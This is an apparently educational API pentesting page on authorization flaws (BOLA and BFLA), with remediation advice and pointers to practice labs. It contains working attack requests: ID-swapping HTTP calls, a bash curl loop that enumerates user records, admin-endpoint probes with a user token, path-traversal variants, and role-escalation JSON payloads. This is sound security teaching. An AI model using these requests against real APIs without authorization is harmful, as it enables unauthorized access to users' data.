API Security
Intermediate
API1 API5

Authorization Testing

Authorization flaws are the most common and critical API vulnerabilities. They occur when the API fails to verify if the authenticated user has permission to access the requested resource or function.

BOLA - Broken Object Level Authorization

BOLA occurs when an API doesn't verify if the user has permission to access a specific object (like a user record, order, or document) based on the ID provided in the request.

1. Identify Endpoints with IDs

Look for endpoints that take an ID as a parameter.

http 
GET /api/users/1001
GET /api/orders/5001
GET /api/documents/doc-abc
GET /api/users/1001
GET /api/orders/5001
GET /api/documents/doc-abc

2. Change IDs

Try changing the ID to access another user's data.

http 
GET /api/users/1002
GET /api/orders/5002
GET /api/documents/doc-xyz
GET /api/users/1002
GET /api/orders/5002
GET /api/documents/doc-xyz

3. Test Different ID Formats

Sometimes APIs support multiple ID formats.

http 
GET /api/users/1             # Sequential integer
GET /api/users/00001         # Padded integer
GET /api/users/user-uuid-here # UUID
GET /api/users/admin         # Username as ID
GET /api/users/user@email.com # Email as ID
GET /api/users/1             # Sequential integer
GET /api/users/00001         # Padded integer
GET /api/users/user-uuid-here # UUID
GET /api/users/admin         # Username as ID
GET /api/users/user@email.com # Email as ID

4. ID Enumeration

Script the enumeration of IDs to find valid objects.

bash 
for id in {1..1000}; do
  response=$(curl -s -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users/$id)
  if [[ $response != *"not found"* ]]; then
    echo "Found: $id"
    echo "$response"
  fi
done
for id in {1..1000}; do
  response=$(curl -s -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users/$id)
  if [[ $response != *"not found"* ]]; then
    echo "Found: $id"
    echo "$response"
  fi
done

5. Test All CRUD Operations

Don't just test GET requests. Try to modify or delete other users' data.

http 
GET    /api/users/1002
PUT    /api/users/1002
DELETE /api/users/1002
PATCH  /api/users/1002
GET    /api/users/1002
PUT    /api/users/1002
DELETE /api/users/1002
PATCH  /api/users/1002

BFLA - Broken Function Level Authorization

BFLA occurs when an API doesn't verify if the user has permission to access a specific function (like an admin endpoint).

1. Identify Privileged Endpoints

Look for endpoints that suggest administrative functionality.

  • /api/admin/users
  • /api/admin/config
  • /api/admin/logs
  • /api/internal/debug
  • /api/management/settings
  • /api/v1/admin/export

2. Access with Low Privileges

Try to access these endpoints with a regular user token.

bash 
curl -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users
curl -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

3. HTTP Method Manipulation

If GET is blocked, try other methods like POST or PUT.

bash 
curl -X POST -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users
curl -X POST -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

4. Path Manipulation

Try to bypass filters by manipulating the URL path.

  • /api/users/../admin/config
  • /api/v1/users/../../admin/users
  • /api/ADMIN/users
  • /api/Admin/users

5. Parameter-Based Escalation

Try to inject parameters that might elevate privileges.

http 
POST /api/users
Content-Type: application/json

{"name": "test", "role": "admin"}
POST /api/users
Content-Type: application/json

{"name": "test", "role": "admin"}

Other common payloads:

json 
{"name": "test", "isAdmin": true}
{"name": "test", "permissions": ["admin", "write", "delete"]}
{"name": "test", "isAdmin": true}
{"name": "test", "permissions": ["admin", "write", "delete"]}

6. Role/Permission Changes

Try to update your own role or permissions.

http 
PUT /api/users/1001
Content-Type: application/json

{"role": "admin"}
PUT /api/users/1001
Content-Type: application/json

{"role": "admin"}

Remediation

Defense Strategies

  • Implement a consistent authorization mechanism that validates the user's permission for every requested function and object.
  • Use random, unpredictable IDs (UUIDs) instead of sequential integers to prevent enumeration.
  • Check authorization in the business logic layer, not just at the API gateway.
  • Write unit tests to verify that unauthorized users cannot access privileged endpoints.

BOLA Is the #1 API Vulnerability

BOLA (aka IDOR) consistently tops the OWASP API list because logic flaws are not caught by scanners. Always test with two accounts at the same privilege level — swap IDs and object references between them. Automated tools miss most BOLA because they don't understand business context.
🎯

Authorization Testing Practice

Exploit BOLA and BFLA vulnerabilities in purpose-built vulnerable API environments.

🔧
vAPI — BOLA/IDOR Challenges Custom Lab medium
Object ID manipulationHorizontal privilege escalationUUID enumeration
Open Lab
🔧
crAPI — BFLA Admin Functions Custom Lab medium
HTTP method tamperingAdmin endpoint accessRole parameter injection
Open Lab
Need help setting up? Check our Lab Setup Guide →
02. Authentication 04. Mass Assignment

Related Topics

← Back to API Pentesting

Overview of API security testing

Authentication Testing

JWT and OAuth vulnerabilities

Mass Assignment

Object property injection

IDOR Attacks

Related web vulnerability